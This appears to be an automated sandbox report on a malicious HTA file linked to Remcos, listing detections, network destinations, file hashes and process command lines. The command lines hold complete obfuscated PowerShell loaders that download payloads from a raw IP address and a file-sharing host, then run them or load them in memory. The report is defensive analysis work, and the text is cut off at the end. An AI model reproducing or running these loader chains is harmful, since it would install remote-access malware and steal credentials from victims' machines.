Analysis Overview
SHA256
712a8d8a82351dc2d2173b6d66245b1e2ee34db4045fa27b3e76dc462f8a5811
Threat Level: Known bad
The file seethebstpricewithbestthinghappingwithgoodnews.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Remcos family
NirSoft WebBrowserPassView
Detected Nirsoft tools
NirSoft MailPassView
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:40
Reported
2024-11-11 09:43
Platform
win7-20241010-en
Max time kernel
16s
Max time network
19s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta"
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'JEpvUDRoOEg5UzAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyZEVGSU5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG1aLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFKTVpMV3BILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBvbkxZd1RQb3EsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5BV0d2c0xFTVl1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRDcFN3WU5HV2h0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ1hqSXVNbXlqTHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEpvUDRoOEg5UzA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NC4xNzEuMTM4LzM1MC9zZWV0aGViZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc3dpdGhvdXRoYW5kbGV0aGV0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzd2l0aG91dGhhbmRsZXRoZXRoLnZicyIsMCwwKTtTVGFyVC1TTEVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3N3aXRob3V0aGFuZGxldGhldGgudmJzIg=='+[cHar]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pcntzdb_.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES272.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC271.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxsaURbMV0rJFNIZWxsaWRbMTNdKydYJykgKCgoJ3VTemltYWdlVXJsID0nKycgJysnNkZVaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/JysnZicrJ2lsZWtleT0yQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjEnKyc0YmIyMDljNjJjMScrJzczMDknKyc0NTE3NmEwOTA0ZiA2RlU7dVN6d2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZScrJ20uTmV0LldlYkNsaWVudCcrJzt1U3ppbWFnZUJ5JysndGVzID0gdVN6d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh1U3ppbWFnZVVybCk7dVN6aW1hZ2VUZXh0ID0gW1N5Jysnc3RlbScrJy5UZXh0LicrJ0VuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodVN6aW1hJysnZ2VCeXRlcyk7dVN6c3RhcnRGbGFnID0gNkZVPDxCQVNFNjRfU1RBUlQ+PjZGVTt1U3plJysnbmQnKydGbCcrJ2FnID0gNkZVPDxCQVNFNjRfRU5EPj42RlU7dVN6c3RhcnRJbmRleCA9IHVTemltYWdlVGV4dC5JbmRleE9mKHVTenN0YXJ0RmxhZyk7dVN6ZW5kSW5kZXggPSB1U3ppbWFnZVRleHQuSW5kZXhPZih1U3plbmRGbGFnKTt1U3onKydzdGFydEluZGV4IC1nZSAwIC1hbmQgdVN6JysnZW5kSW5kZXggLWd0IHVTenN0YXJ0JysnSW4nKydkZXg7dVN6c3RhcnRJbmRleCArPSB1U3pzdGFydEZsYWcuTGVuZ3RoO3VTemJhc2U2NExlbmd0aCA9IHVTeicrJ2VuZEluZGV4IC0gdVN6c3RhcnRJbmRleDt1U3piYXNlNjRDb21tYW5kID0gdVN6aW1hJysnZ2VUZXh0LlN1YnN0cmluZyh1U3pzdGFydEluZGV4LCB1U3piYXNlNjRMZW5ndGgpO3VTemJhc2U2NFJldmVyJysnc2VkID0gLWpvaW4gKHVTemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBhUXAgRm9yRWFjaC1PYmplY3QgeyB1U3pfIH0nKycpWy0xLi4tKHVTemJhc2U2NENvbW1hbicrJ2QuTGVuZ3RoKV07dVN6Y29tbWFuZEJ5dGUnKydzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh1U3piYXNlNjRSZXZlcnNlZCk7JysndVN6bG9hZGVkJysnQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHVTemMnKydvbW1hbmRCeXRlcyk7dVN6dmFpTWV0JysnaG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGhvZCg2JysnRlVWQUk2RlUpO3VTenZhaU1ldGhvZC5JbnZva2UodVN6bnVsbCwgQCg2JysnRlV0eHQuU0RPR1RIVy8wNTMvODMxLjE3MS40OS4zMi8vOnB0dGg2RicrJ1UsIDZGVScrJ2Rlc2F0aXZhZG82RlUsIDZGVWRlc2F0aXZhZG82RlUsIDZGVWQnKydlc2F0aXZhZG82RlUsIDZGVUNhc1BvbDZGVSwgNkYnKydVZGVzYXRpdmFkbzZGVSwgNkZVJysnZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVZGVzYXRpdmFkbzZGVSw2RlVkZXNhdGl2YWRvNkZVLDZGVWRlc2F0aXZhZG82RlUsNkZVMTZGVSw2RlVkZXNhdGl2YWRvNkZVKSk7JykgIC1yZXBsYWNlIChbY0hhcl01NCtbY0hhcl03MCtbY0hhcl04NSksW2NIYXJdMzktcmVwbGFjZSAgKFtjSGFyXTExNytbY0hhcl04MytbY0hhcl0xMjIpLFtjSGFyXTM2IC1DUkVwTEFjZSAgJ2FRcCcsW2NIYXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElliD[1]+$SHellid[13]+'X') ((('uSzimageUrl ='+' '+'6FUhttps://1017.filemail.com/api/file/get?'+'f'+'ilekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f61'+'4bb209c62c1'+'7309'+'45176a0904f 6FU;uSzwe'+'bClient = New-Object Syste'+'m.Net.WebClient'+';uSzimageBy'+'tes = uSzwebClient.DownloadData(uSzimageUrl);uSzimageText = [Sy'+'stem'+'.Text.'+'Encoding]::UTF8.GetString(uSzima'+'geBytes);uSzstartFlag = 6FU<<BASE64_START>>6FU;uSze'+'nd'+'Fl'+'ag = 6FU<<BASE64_END>>6FU;uSzstartIndex = uSzimageText.IndexOf(uSzstartFlag);uSzendIndex = uSzimageText.IndexOf(uSzendFlag);uSz'+'startIndex -ge 0 -and uSz'+'endIndex -gt uSzstart'+'In'+'dex;uSzstartIndex += uSzstartFlag.Length;uSzbase64Length = uSz'+'endIndex - uSzstartIndex;uSzbase64Command = uSzima'+'geText.Substring(uSzstartIndex, uSzbase64Length);uSzbase64Rever'+'sed = -join (uSzbase64Command.ToCharArray() aQp ForEach-Object { uSz_ }'+')[-1..-(uSzbase64Comman'+'d.Length)];uSzcommandByte'+'s = [System.Convert]::FromBase64String(uSzbase64Reversed);'+'uSzloaded'+'Assembly = [System.Reflection.Assembly]::Load(uSzc'+'ommandBytes);uSzvaiMet'+'hod = [d'+'nlib.IO.Home].GetMethod(6'+'FUVAI6FU);uSzvaiMethod.Invoke(uSznull, @(6'+'FUtxt.SDOGTHW/053/831.171.49.32//:ptth6F'+'U, 6FU'+'desativado6FU, 6FUdesativado6FU, 6FUd'+'esativado6FU, 6FUCasPol6FU, 6F'+'Udesativado6FU, 6FU'+'desativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FUdesativado6FU,6FU16FU,6FUdesativado6FU));') -replace ([cHar]54+[cHar]70+[cHar]85),[cHar]39-replace ([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
Network
| Country | Destination | Domain | Proto |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | efb2ffc06b69c9bf228ac00e4a9b3be4 |
| SHA1 | a8181396d86baca87fb7e88621028011e797f33c |
| SHA256 | f5628a33643263153d90f2a33c37d296eefb9583e704dd7afee225009477bbb6 |
| SHA512 | 59b0df51496b0ca939244df11e76fdbc289283ab3247be388dad786fc187223ad02afb464b2e104aa00d4443131fbcfa36b002c47a0bb4f39b3c4d4062f1880b |
\??\c:\Users\Admin\AppData\Local\Temp\pcntzdb_.cmdline
| MD5 | aed4a0569645cd3a6f9c98c0667691be |
| SHA1 | 2c369fac943486b07749aee533b1e106fc9ee2d0 |
| SHA256 | 3fa75e24d5a855f128f4e07cf3bfa6fd9275d93a4c857fd9b0105ccd61fb52b0 |
| SHA512 | 1557f32324ccde5bcd106798ed190df4f11a2227e1c25387c5f24786caa5cf141072a86b470396e2ed6aa055979ed574fb9eeaca7b6c4f8551da9d5e05583351 |
\??\c:\Users\Admin\AppData\Local\Temp\pcntzdb_.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC271.tmp
| MD5 | f0a5c934ab745de7cfa52034d9b1caee |
| SHA1 | 603db8a3e5cac1340799f510ddcc5e263483fe95 |
| SHA256 | 90f88d4a8deaf74c435acfce405911465ad9e8131f49ba40dc300ca0375e4af1 |
| SHA512 | caf8bc9e1e2bb95c7ef0675d253dfdab1d9e89c744aba364877f6c1f43c6f14146fdd9523893ec5b7dd2708c431644006a6fad88e47f24d721ecf1db67adcd1d |
C:\Users\Admin\AppData\Local\Temp\RES272.tmp
| MD5 | 0315a2b13e1b3b797545dca898cfd13e |
| SHA1 | 8881f6496ce67bb21f221de5082d175e9f7c3fa0 |
| SHA256 | 4513e1752a196dc4318fb6512fef03f26a961f740d3d4c1f4054048196d35f4c |
| SHA512 | 2b8295190dca04127c3b52f16c52e76c4faac0d48f452182bf84b951cec91d5f929fb903935d87286994d686d0c77185712a7e21cc58cca41b456a400e90525d |
C:\Users\Admin\AppData\Local\Temp\pcntzdb_.dll
| MD5 | f4d60406b00a6ba1d79256a4d50fec15 |
| SHA1 | 4736d83745df16c15f98a230181b8eda85eba42e |
| SHA256 | b3b46abd4927d199f92c82227bb6ef82c616fde2360b340f1025acd9f30758d7 |
| SHA512 | a6f4590a0e978f7360318a762d00928243325c292b41fad37626ac64dfb8a94677530378aef90f020d4b09ac766156e8f87828bc4a18ba2f7eabdcf8dbfe12d8 |
C:\Users\Admin\AppData\Local\Temp\pcntzdb_.pdb
| MD5 | 1e63a22073540550f79e71819937dd7c |
| SHA1 | 3b89159e089d2df7300b8fceec19079a52f5cdf2 |
| SHA256 | 5e0cdf3a0f9e71360eeccaf42f21ba9c7caf9d63ba7894b55a990f29f4735050 |
| SHA512 | 433c61960c6513bb1056e918cc5ca342a184e1903482e8564d9a559e9685249e2d89c0b0c80ff84a3ec5b1d57cb9950d85cc6daf9ffa4fa88093b95466b6d8a5 |
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:40
Reported
2024-11-11 09:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Remcos
Remcos family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2320 set thread context of 3696 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 2572 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 3864 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3696 set thread context of 3736 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebstpricewithbestthinghappingwithgoodnews.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WinDOwspowERSheLl\V1.0\POWErshell.ExE
"C:\Windows\sYSTem32\WinDOwspowERSheLl\V1.0\POWErshell.ExE" "PoWersHELL.Exe -ex BypASS -nOP -W 1 -c devICecreDEntIAlDEploYMENt ; IeX($(iEx('[SySTEM.tExT.EncODIng]'+[cHaR]0X3a+[CHAR]58+'uTF8.geTSTrING([sySTEm.coNVert]'+[chAR]58+[cHAr]0x3A+'frOmBASE64sTRInG('+[CHaR]0x22+'JEpvUDRoOEg5UzAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyZEVGSU5pdElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG1aLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFKTVpMV3BILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBvbkxZd1RQb3EsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5BV0d2c0xFTVl1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRDcFN3WU5HV2h0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ1hqSXVNbXlqTHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtU